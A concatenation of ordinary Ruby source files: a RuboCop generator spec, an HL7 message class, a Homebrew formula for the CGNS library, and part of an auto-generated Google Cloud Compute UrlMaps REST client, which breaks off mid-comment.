it 'does not accept an unqualified cop' do
expect { described_class.new('FakeCop', 'your_id') }
.to raise_error(ArgumentError)
.with_message('Specify a cop name with Department/Name style')
end
end
describe '#inject_config' do
let(:path) { @path } # rubocop:disable RSpec/InstanceVariable
around do |example|
Tempfile.create('rubocop-config.yml') do |file|
@path = file.path
example.run
end
end
before do
IO.write(path, <<~YAML)
Style/Alias:
Enabled: true
Style/Lambda:
Enabled: true
Style/SpecialGlobalVars:
Enabled: true
YAML
stub_const('RuboCop::Version::STRING', '0.58.2')
end
context 'when it is the middle in alphabetical order' do
it 'inserts the cop' do
expect(File).to receive(:write).with(path, <<~YAML)
Style/Alias:
Enabled: true
Style/FakeCop:
Description: 'TODO: Write a description of the cop.'
Enabled: pending
VersionAdded: '0.59'
Style/Lambda:
Enabled: true
Style/SpecialGlobalVars:
Enabled: true
YAML
generator.inject_config(config_file_path: path)
expect(stdout.string)
.to eq('[modify] A configuration for the cop is added into ' \
"#{path}.\n")
end
end
context 'when it is the first in alphabetical order' do
let(:cop_identifier) { 'Style/Aaa' }
it 'inserts the cop' do
expect(File).to receive(:write).with(path, <<~YAML)
Style/Aaa:
Description: 'TODO: Write a description of the cop.'
Enabled: pending
VersionAdded: '0.59'
Style/Alias:
Enabled: true
Style/Lambda:
Enabled: true
Style/SpecialGlobalVars:
Enabled: true
YAML
generator.inject_config(config_file_path: path)
expect(stdout.string)
.to eq('[modify] A configuration for the cop is added into ' \
"#{path}.\n")
end
end
context 'when it is the last in alphabetical order' do
let(:cop_identifier) { 'Style/Zzz' }
it 'inserts the cop' do
expect(File).to receive(:write).with(path, <<~YAML)
Style/Alias:
Enabled: true
Style/Lambda:
Enabled: true
Style/SpecialGlobalVars:
Enabled: true
Style/Zzz:
Description: 'TODO: Write a description of the cop.'
Enabled: pending
VersionAdded: '0.59'
YAML
generator.inject_config(config_file_path: path)
expect(stdout.string)
.to eq('[modify] A configuration for the cop is added into ' \
"#{path}.\n")
end
end
end
describe '#snake_case' do
it 'converts "Lint" to snake_case' do
expect(generator.__send__(:snake_case, 'Lint')).to eq('lint')
end
it 'converts "FooBar" to snake_case' do
expect(generator.__send__(:snake_case, 'FooBar')).to eq('foo_bar')
end
it 'converts "RSpec" to snake_case' do
expect(generator.__send__(:snake_case, 'RSpec')).to eq('rspec')
end
end
describe 'compliance with rubocop', :isolated_environment do
include FileHelper
around do |example|
orig_registry = RuboCop::Cop::Cop.registry
RuboCop::Cop::Cop.instance_variable_set(
:@registry,
RuboCop::Cop::Registry.new(
[RuboCop::Cop::InternalAffairs::NodeDestructuring]
)
)
example.run
RuboCop::Cop::Cop.instance_variable_set(:@registry, orig_registry)
end
let(:config) do
config = RuboCop::ConfigStore.new
path = File.join(RuboCop::ConfigLoader::RUBOCOP_HOME,
RuboCop::ConfigLoader::DOTFILE)
config.options_config = path
config
end
let(:options) { { formatters: [] } }
let(:runner) { RuboCop::Runner.new(options, config) }
it 'generates a cop file that has no offense' do
generator.write_source
expect(runner.run([])).to be true
end
it 'generates a spec file that has no offense' do
generator.write_spec
expect(runner.run([])).to be true
end
end
end
| 27.837838 | 99 | 0.558037 |
38a3132b702f5a7463ba0d6f529b48d628a3dc00 | 1,025 | module HealthSeven::V2_3_1
class SurP09 < ::HealthSeven::Message
attribute :msh, Msh, position: "MSH", require: true
class Facility < ::HealthSeven::SegmentGroup
attribute :fac, Fac, position: "FAC", require: true
class Product < ::HealthSeven::SegmentGroup
attribute :psh, Psh, position: "PSH", require: true
attribute :pdc, Pdc, position: "PDC", require: true
end
attribute :products, Array[Product], position: "SUR_P09.PRODUCT", require: true, multiple: true
attribute :psh, Psh, position: "PSH", require: true
class FacilityDetail < ::HealthSeven::SegmentGroup
attribute :fac, Fac, position: "FAC", require: true
attribute :pdc, Pdc, position: "PDC", require: true
attribute :nte, Nte, position: "NTE", require: true
end
attribute :facility_details, Array[FacilityDetail], position: "SUR_P09.FACILITY_DETAIL", require: true, multiple: true
end
attribute :facilities, Array[Facility], position: "SUR_P09.FACILITY", require: true, multiple: true
end
end | 48.809524 | 122 | 0.707317 |
b97552f04d9b8a8eabb8a4f1373d966f4acc7776 | 2,173 | class Cgns < Formula
desc "CFD General Notation System"
homepage "http://cgns.org/"
url "https://github.com/CGNS/CGNS/archive/v4.1.2.tar.gz"
sha256 "951653956f509b8a64040f1440c77f5ee0e6e2bf0a9eef1248d370f60a400050"
license "BSD-3-Clause"
head "https://github.com/CGNS/CGNS.git"
livecheck do
url :head
regex(/^v?(\d+(?:\.\d+)+)$/i)
end
bottle do
cellar :any
sha256 "e2e5eb665f0f5c94c7782f0aed3708124705792ff5a7adf945a537369db6d724" => :big_sur
sha256 "abc3326bddbf58509b5ffb3834d68836ad803abf83f9958ae6a012870e7e9f85" => :arm64_big_sur
sha256 "4371c695cad1aa0bccbaaf0deccb9a8f5ddf7271dcbbddf6307b8d0bc254cec5" => :catalina
sha256 "d9904ca7c839a5d0421b99ba784e98fec047971de47efa5d3cc00725cd892e26" => :mojave
sha256 "8bfeb33c22f79c998b31fea6aafc60aecf2edf18ea754799c67c012d90555ec9" => :high_sierra
sha256 "3aca3463b3f007445d8d8f3d380b06e619fca591406f540ac56d8e08b20e2f54" => :x86_64_linux
end
depends_on "cmake" => :build
depends_on "gcc"
depends_on "hdf5"
depends_on "szip"
uses_from_macos "zlib"
def install
args = std_cmake_args + %w[
-DCGNS_ENABLE_64BIT=YES
-DCGNS_ENABLE_FORTRAN=YES
-DCGNS_ENABLE_HDF5=YES
]
mkdir "build" do
system "cmake", "..", *args
system "make"
system "make", "install"
end
# Avoid references to Homebrew shims
os = OS.mac? ? "mac" : "linux"
cc = OS.mac? ? "clang" : "gcc-5"
inreplace include/"cgnsBuild.defs", HOMEBREW_LIBRARY/"Homebrew/shims/#{os}/super/#{cc}", "/usr/bin/#{cc}"
end
test do
(testpath/"test.c").write <<~EOS
#include <stdio.h>
#include "cgnslib.h"
int main(int argc, char *argv[])
{
int filetype = CG_FILE_NONE;
if (cg_is_cgns(argv[0], &filetype) != CG_ERROR)
return 1;
return 0;
}
EOS
system Formula["hdf5"].opt_prefix/"bin/h5cc", testpath/"test.c", "-L#{opt_lib}", "-lcgns",
*("-Wl,-rpath=#{Formula["szip"].opt_lib}" unless OS.mac?),
*("-Wl,-rpath=#{lib}" unless OS.mac?)
system "./a.out"
end
end
| 31.955882 | 109 | 0.64381 |
ed5bce196582810062a2cd397140ea69455136e8 | 50,567 | # frozen_string_literal: true
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
require "google/cloud/errors"
require "google/cloud/compute/v1/compute_pb"
require "google/cloud/compute/v1/url_maps/rest/service_stub"
module Google
module Cloud
module Compute
module V1
module UrlMaps
module Rest
##
# REST client for the UrlMaps service.
#
# The UrlMaps API.
#
class Client
# @private
attr_reader :url_maps_stub
##
# Configure the UrlMaps Client class.
#
# See {::Google::Cloud::Compute::V1::UrlMaps::Rest::Client::Configuration}
# for a description of the configuration fields.
#
# ## Example
#
# To modify the configuration for all UrlMaps clients:
#
# ::Google::Cloud::Compute::V1::UrlMaps::Rest::Client.configure do |config|
# config.timeout = 10.0
# end
#
# @yield [config] Configure the Client client.
# @yieldparam config [Client::Configuration]
#
# @return [Client::Configuration]
#
def self.configure
@configure ||= begin
namespace = ["Google", "Cloud", "Compute", "V1"]
parent_config = while namespace.any?
parent_name = namespace.join "::"
parent_const = const_get parent_name
break parent_const.configure if parent_const.respond_to? :configure
namespace.pop
end
default_config = Client::Configuration.new parent_config
default_config
end
yield @configure if block_given?
@configure
end
##
# Configure the UrlMaps Client instance.
#
# The configuration is set to the derived mode, meaning that values can be changed,
# but structural changes (adding new fields, etc.) are not allowed. Structural changes
# should be made on {Client.configure}.
#
# See {::Google::Cloud::Compute::V1::UrlMaps::Rest::Client::Configuration}
# for a description of the configuration fields.
#
# @yield [config] Configure the Client client.
# @yieldparam config [Client::Configuration]
#
# @return [Client::Configuration]
#
def configure
yield @config if block_given?
@config
end
##
# Create a new UrlMaps REST client object.
#
# ## Examples
#
# To create a new UrlMaps REST client with the default
# configuration:
#
# client = ::Google::Cloud::Compute::V1::UrlMaps::Rest::Client.new
#
# To create a new UrlMaps REST client with a custom
# configuration:
#
# client = ::Google::Cloud::Compute::V1::UrlMaps::Rest::Client.new do |config|
# config.timeout = 10.0
# end
#
# @yield [config] Configure the UrlMaps client.
# @yieldparam config [Client::Configuration]
#
def initialize
# Create the configuration object
@config = Configuration.new Client.configure
# Yield the configuration if needed
yield @config if block_given?
# Create credentials
credentials = @config.credentials
credentials ||= Credentials.default scope: @config.scope
if credentials.is_a?(::String) || credentials.is_a?(::Hash)
credentials = Credentials.new credentials, scope: @config.scope
end
@url_maps_stub = ::Google::Cloud::Compute::V1::UrlMaps::Rest::ServiceStub.new endpoint: @config.endpoint, credentials: credentials
end
# Service calls
##
# Retrieves the list of all UrlMap resources, regional and global, available to the specified project.
#
# @overload aggregated_list(request, options = nil)
# Pass arguments to `aggregated_list` via a request object, either of type
# {::Google::Cloud::Compute::V1::AggregatedListUrlMapsRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Compute::V1::AggregatedListUrlMapsRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries etc. Optional.
# Note: currently retry functionality is not implemented. While it is possible
# to set it using ::Gapic::CallOptions, it will not be applied
#
# @overload aggregated_list(filter: nil, include_all_scopes: nil, max_results: nil, order_by: nil, page_token: nil, project: nil, return_partial_success: nil)
# Pass arguments to `aggregated_list` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param filter [::String]
# A filter expression that filters resources listed in the response. The expression must specify the field name, a comparison operator, and the value that you want to use for filtering. The value must be a string, a number, or a boolean. The comparison operator must be either `=`, `!=`, `>`, or `<`.
#
# For example, if you are filtering Compute Engine instances, you can exclude instances named `example-instance` by specifying `name != example-instance`.
#
# You can also filter nested fields. For example, you could specify `scheduling.automaticRestart = false` to include instances only if they are not scheduled for automatic restarts. You can use filtering on nested fields to filter based on resource labels.
#
# To filter on multiple expressions, provide each separate expression within parentheses. For example: ``` (scheduling.automaticRestart = true) (cpuPlatform = "Intel Skylake") ``` By default, each expression is an `AND` expression. However, you can include `AND` and `OR` expressions explicitly. For example: ``` (cpuPlatform = "Intel Skylake") OR (cpuPlatform = "Intel Broadwell") AND (scheduling.automaticRestart = true) ```
# @param include_all_scopes [::Boolean]
# Indicates whether every visible scope for each scope type (zone, region, global) should be included in the response. For new resource types added after this field, the flag has no effect as new resource types will always include every visible scope for each scope type in response. For resource types which predate this field, if this flag is omitted or false, only scopes of the scope types where the resource type is expected to be found will be included.
# @param max_results [::Integer]
# The maximum number of results per page that should be returned. If the number of available results is larger than `maxResults`, Compute Engine returns a `nextPageToken` that can be used to get the next page of results in subsequent list requests. Acceptable values are `0` to `500`, inclusive. (Default: `500`)
# @param order_by [::String]
# Sorts list results by a certain order. By default, results are returned in alphanumerical order based on the resource name.
#
# You can also sort results in descending order based on the creation timestamp using `orderBy="creationTimestamp desc"`. This sorts results based on the `creationTimestamp` field in reverse chronological order (newest result first). Use this to sort resources like operations so that the newest operation is returned first.
#
# Currently, only sorting by `name` or `creationTimestamp desc` is supported.
# @param page_token [::String]
# Specifies a page token to use. Set `pageToken` to the `nextPageToken` returned by a previous list request to get the next page of results.
# @param project [::String]
# Name of the project scoping this request.
# @param return_partial_success [::Boolean]
# Opt-in for partial success behavior which provides partial results in case of failure. The default value is false.
# @yield [result, response] Access the result along with the Faraday response object
# @yieldparam result [::Gapic::Rest::PagedEnumerable<::String, ::Google::Cloud::Compute::V1::UrlMapsScopedList>]
# @yieldparam response [::Faraday::Response]
#
# @return [::Gapic::Rest::PagedEnumerable<::String, ::Google::Cloud::Compute::V1::UrlMapsScopedList>]
#
# @raise [::Google::Cloud::Error] if the REST call is aborted.
def aggregated_list request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Compute::V1::AggregatedListUrlMapsRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
call_metadata = {}
# Set x-goog-api-client header
call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Compute::V1::VERSION,
transports_version_send: [:rest]
options.apply_defaults timeout: @config.timeout,
metadata: call_metadata
@url_maps_stub.aggregated_list request, options do |result, response|
result = ::Gapic::Rest::PagedEnumerable.new @url_maps_stub, :aggregated_list, "items", request, result, options
yield result, response if block_given?
return result
end
rescue ::Faraday::Error => e
gapic_error = ::Gapic::Rest::Error.wrap_faraday_error e
raise ::Google::Cloud::Error.from_error(gapic_error)
end
##
# Deletes the specified UrlMap resource.
#
# @overload delete(request, options = nil)
# Pass arguments to `delete` via a request object, either of type
# {::Google::Cloud::Compute::V1::DeleteUrlMapRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Compute::V1::DeleteUrlMapRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries etc. Optional.
# Note: currently retry functionality is not implemented. While it is possible
# to set it using ::Gapic::CallOptions, it will not be applied
#
# @overload delete(project: nil, request_id: nil, url_map: nil)
# Pass arguments to `delete` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param project [::String]
# Project ID for this request.
# @param request_id [::String]
# An optional request ID to identify requests. Specify a unique request ID so that if you must retry your request, the server will know to ignore the request if it has already been completed.
#
# For example, consider a situation where you make an initial request and the request times out. If you make the request again with the same request ID, the server can check if original operation with the same request ID was received, and if so, will ignore the second request. This prevents clients from accidentally creating duplicate commitments.
#
# The request ID must be a valid UUID with the exception that zero UUID is not supported (00000000-0000-0000-0000-000000000000).
# @param url_map [::String]
# Name of the UrlMap resource to delete.
# @yield [result, response] Access the result along with the Faraday response object
# @yieldparam result [::Google::Cloud::Compute::V1::Operation]
# @yieldparam response [::Faraday::Response]
#
# @return [::Google::Cloud::Compute::V1::Operation]
#
# @raise [::Google::Cloud::Error] if the REST call is aborted.
def delete request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Compute::V1::DeleteUrlMapRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
call_metadata = {}
# Set x-goog-api-client header
call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Compute::V1::VERSION,
transports_version_send: [:rest]
options.apply_defaults timeout: @config.timeout,
metadata: call_metadata
@url_maps_stub.delete request, options do |result, response|
yield result, response if block_given?
return result
end
rescue ::Faraday::Error => e
gapic_error = ::Gapic::Rest::Error.wrap_faraday_error e
raise ::Google::Cloud::Error.from_error(gapic_error)
end
##
# Returns the specified UrlMap resource. Gets a list of available URL maps by making a list() request.
#
# @overload get(request, options = nil)
# Pass arguments to `get` via a request object, either of type
# {::Google::Cloud::Compute::V1::GetUrlMapRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Compute::V1::GetUrlMapRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries etc. Optional.
# Note: currently retry functionality is not implemented. While it is possible
# to set it using ::Gapic::CallOptions, it will not be applied
#
# @overload get(project: nil, url_map: nil)
# Pass arguments to `get` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param project [::String]
# Project ID for this request.
# @param url_map [::String]
# Name of the UrlMap resource to return.
# @yield [result, response] Access the result along with the Faraday response object
# @yieldparam result [::Google::Cloud::Compute::V1::UrlMap]
# @yieldparam response [::Faraday::Response]
#
# @return [::Google::Cloud::Compute::V1::UrlMap]
#
# @raise [::Google::Cloud::Error] if the REST call is aborted.
def get request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Compute::V1::GetUrlMapRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
call_metadata = {}
# Set x-goog-api-client header
call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Compute::V1::VERSION,
transports_version_send: [:rest]
options.apply_defaults timeout: @config.timeout,
metadata: call_metadata
@url_maps_stub.get request, options do |result, response|
yield result, response if block_given?
return result
end
rescue ::Faraday::Error => e
gapic_error = ::Gapic::Rest::Error.wrap_faraday_error e
raise ::Google::Cloud::Error.from_error(gapic_error)
end
##
# Creates a UrlMap resource in the specified project using the data included in the request.
#
# @overload insert(request, options = nil)
# Pass arguments to `insert` via a request object, either of type
# {::Google::Cloud::Compute::V1::InsertUrlMapRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Compute::V1::InsertUrlMapRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries etc. Optional.
# Note: currently retry functionality is not implemented. While it is possible
# to set it using ::Gapic::CallOptions, it will not be applied
#
# @overload insert(project: nil, request_id: nil, url_map_resource: nil)
# Pass arguments to `insert` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param project [::String]
# Project ID for this request.
# @param request_id [::String]
# An optional request ID to identify requests. Specify a unique request ID so that if you must retry your request, the server will know to ignore the request if it has already been completed.
#
# For example, consider a situation where you make an initial request and the request times out. If you make the request again with the same request ID, the server can check if original operation with the same request ID was received, and if so, will ignore the second request. This prevents clients from accidentally creating duplicate commitments.
#
# The request ID must be a valid UUID with the exception that zero UUID is not supported (00000000-0000-0000-0000-000000000000).
# @param url_map_resource [::Google::Cloud::Compute::V1::UrlMap, ::Hash]
# The body resource for this request
# @yield [result, response] Access the result along with the Faraday response object
# @yieldparam result [::Google::Cloud::Compute::V1::Operation]
# @yieldparam response [::Faraday::Response]
#
# @return [::Google::Cloud::Compute::V1::Operation]
#
# @raise [::Google::Cloud::Error] if the REST call is aborted.
def insert request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Compute::V1::InsertUrlMapRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
call_metadata = {}
# Set x-goog-api-client header
call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Compute::V1::VERSION,
transports_version_send: [:rest]
options.apply_defaults timeout: @config.timeout,
metadata: call_metadata
@url_maps_stub.insert request, options do |result, response|
yield result, response if block_given?
return result
end
rescue ::Faraday::Error => e
gapic_error = ::Gapic::Rest::Error.wrap_faraday_error e
raise ::Google::Cloud::Error.from_error(gapic_error)
end
##
# Initiates a cache invalidation operation, invalidating the specified path, scoped to the specified UrlMap.
#
# For more information, see [Invalidating cached content](/cdn/docs/invalidating-cached-content).
#
# @overload invalidate_cache(request, options = nil)
# Pass arguments to `invalidate_cache` via a request object, either of type
# {::Google::Cloud::Compute::V1::InvalidateCacheUrlMapRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Compute::V1::InvalidateCacheUrlMapRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries etc. Optional.
# Note: currently retry functionality is not implemented. While it is possible
# to set it using ::Gapic::CallOptions, it will not be applied
#
# @overload invalidate_cache(cache_invalidation_rule_resource: nil, project: nil, request_id: nil, url_map: nil)
# Pass arguments to `invalidate_cache` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param cache_invalidation_rule_resource [::Google::Cloud::Compute::V1::CacheInvalidationRule, ::Hash]
# The body resource for this request
# @param project [::String]
# Project ID for this request.
# @param request_id [::String]
# An optional request ID to identify requests. Specify a unique request ID so that if you must retry your request, the server will know to ignore the request if it has already been completed.
#
# For example, consider a situation where you make an initial request and the request times out. If you make the request again with the same request ID, the server can check if original operation with the same request ID was received, and if so, will ignore the second request. This prevents clients from accidentally creating duplicate commitments.
#
# The request ID must be a valid UUID with the exception that zero UUID is not supported (00000000-0000-0000-0000-000000000000).
# @param url_map [::String]
# Name of the UrlMap scoping this request.
# @yield [result, response] Access the result along with the Faraday response object
# @yieldparam result [::Google::Cloud::Compute::V1::Operation]
# @yieldparam response [::Faraday::Response]
#
# @return [::Google::Cloud::Compute::V1::Operation]
#
# @raise [::Google::Cloud::Error] if the REST call is aborted.
def invalidate_cache request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Compute::V1::InvalidateCacheUrlMapRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
call_metadata = {}
# Set x-goog-api-client header
call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Compute::V1::VERSION,
transports_version_send: [:rest]
options.apply_defaults timeout: @config.timeout,
metadata: call_metadata
@url_maps_stub.invalidate_cache request, options do |result, response|
yield result, response if block_given?
return result
end
rescue ::Faraday::Error => e
gapic_error = ::Gapic::Rest::Error.wrap_faraday_error e
raise ::Google::Cloud::Error.from_error(gapic_error)
end
##
# Retrieves the list of UrlMap resources available to the specified project.
#
# @overload list(request, options = nil)
# Pass arguments to `list` via a request object, either of type
# {::Google::Cloud::Compute::V1::ListUrlMapsRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Compute::V1::ListUrlMapsRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries etc. Optional.
# Note: currently retry functionality is not implemented. While it is possible
# to set it using ::Gapic::CallOptions, it will not be applied
#
# @overload list(filter: nil, max_results: nil, order_by: nil, page_token: nil, project: nil, return_partial_success: nil)
# Pass arguments to `list` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param filter [::String]
# A filter expression that filters resources listed in the response. The expression must specify the field name, a comparison operator, and the value that you want to use for filtering. The value must be a string, a number, or a boolean. The comparison operator must be either `=`, `!=`, `>`, or `<`.
#
# For example, if you are filtering Compute Engine instances, you can exclude instances named `example-instance` by specifying `name != example-instance`.
#
# You can also filter nested fields. For example, you could specify `scheduling.automaticRestart = false` to include instances only if they are not scheduled for automatic restarts. You can use filtering on nested fields to filter based on resource labels.
#
# To filter on multiple expressions, provide each separate expression within parentheses. For example: ``` (scheduling.automaticRestart = true) (cpuPlatform = "Intel Skylake") ``` By default, each expression is an `AND` expression. However, you can include `AND` and `OR` expressions explicitly. For example: ``` (cpuPlatform = "Intel Skylake") OR (cpuPlatform = "Intel Broadwell") AND (scheduling.automaticRestart = true) ```
# @param max_results [::Integer]
# The maximum number of results per page that should be returned. If the number of available results is larger than `maxResults`, Compute Engine returns a `nextPageToken` that can be used to get the next page of results in subsequent list requests. Acceptable values are `0` to `500`, inclusive. (Default: `500`)
# @param order_by [::String]
# Sorts list results by a certain order. By default, results are returned in alphanumerical order based on the resource name.
#
# You can also sort results in descending order based on the creation timestamp using `orderBy="creationTimestamp desc"`. This sorts results based on the `creationTimestamp` field in reverse chronological order (newest result first). Use this to sort resources like operations so that the newest operation is returned first.
#
# Currently, only sorting by `name` or `creationTimestamp desc` is supported.
# @param page_token [::String]
# Specifies a page token to use. Set `pageToken` to the `nextPageToken` returned by a previous list request to get the next page of results.
# @param project [::String]
# Project ID for this request.
# @param return_partial_success [::Boolean]
# Opt-in for partial success behavior which provides partial results in case of failure. The default value is false.
# @yield [result, response] Access the result along with the Faraday response object
# @yieldparam result [::Gapic::Rest::PagedEnumerable<::Google::Cloud::Compute::V1::UrlMap>]
# @yieldparam response [::Faraday::Response]
#
# @return [::Gapic::Rest::PagedEnumerable<::Google::Cloud::Compute::V1::UrlMap>]
#
# @raise [::Google::Cloud::Error] if the REST call is aborted.
def list request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Compute::V1::ListUrlMapsRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
call_metadata = {}
# Set x-goog-api-client header
call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Compute::V1::VERSION,
transports_version_send: [:rest]
options.apply_defaults timeout: @config.timeout,
metadata: call_metadata
@url_maps_stub.list request, options do |result, response|
result = ::Gapic::Rest::PagedEnumerable.new @url_maps_stub, :list, "items", request, result, options
yield result, response if block_given?
return result
end
rescue ::Faraday::Error => e
gapic_error = ::Gapic::Rest::Error.wrap_faraday_error e
raise ::Google::Cloud::Error.from_error(gapic_error)
end
##
# Patches the specified UrlMap resource with the data included in the request. This method supports PATCH semantics and uses the JSON merge patch format and processing rules.
#
# @overload patch(request, options = nil)
# Pass arguments to `patch` via a request object, either of type
# {::Google::Cloud::Compute::V1::PatchUrlMapRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Compute::V1::PatchUrlMapRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries etc. Optional.
# Note: currently retry functionality is not implemented. While it is possible
# to set it using ::Gapic::CallOptions, it will not be applied
#
# @overload patch(project: nil, request_id: nil, url_map: nil, url_map_resource: nil)
# Pass arguments to `patch` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param project [::String]
# Project ID for this request.
# @param request_id [::String]
# An optional request ID to identify requests. Specify a unique request ID so that if you must retry your request, the server will know to ignore the request if it has already been completed.
#
# For example, consider a situation where you make an initial request and the request times out. If you make the request again with the same request ID, the server can check if original operation with the same request ID was received, and if so, will ignore the second request. This prevents clients from accidentally creating duplicate commitments.
#
# The request ID must be a valid UUID with the exception that zero UUID is not supported (00000000-0000-0000-0000-000000000000).
# @param url_map [::String]
# Name of the UrlMap resource to patch.
# @param url_map_resource [::Google::Cloud::Compute::V1::UrlMap, ::Hash]
# The body resource for this request
# @yield [result, response] Access the result along with the Faraday response object
# @yieldparam result [::Google::Cloud::Compute::V1::Operation]
# @yieldparam response [::Faraday::Response]
#
# @return [::Google::Cloud::Compute::V1::Operation]
#
# @raise [::Google::Cloud::Error] if the REST call is aborted.
def patch request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Compute::V1::PatchUrlMapRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
call_metadata = {}
# Set x-goog-api-client header
call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Compute::V1::VERSION,
transports_version_send: [:rest]
options.apply_defaults timeout: @config.timeout,
metadata: call_metadata
@url_maps_stub.patch request, options do |result, response|
yield result, response if block_given?
return result
end
rescue ::Faraday::Error => e
gapic_error = ::Gapic::Rest::Error.wrap_faraday_error e
raise ::Google::Cloud::Error.from_error(gapic_error)
end
##
# Updates the specified UrlMap resource with the data included in the request.
#
# @overload update(request, options = nil)
# Pass arguments to `update` via a request object, either of type
# {::Google::Cloud::Compute::V1::UpdateUrlMapRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Compute::V1::UpdateUrlMapRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries etc. Optional.
# Note: currently retry functionality is not implemented. While it is possible
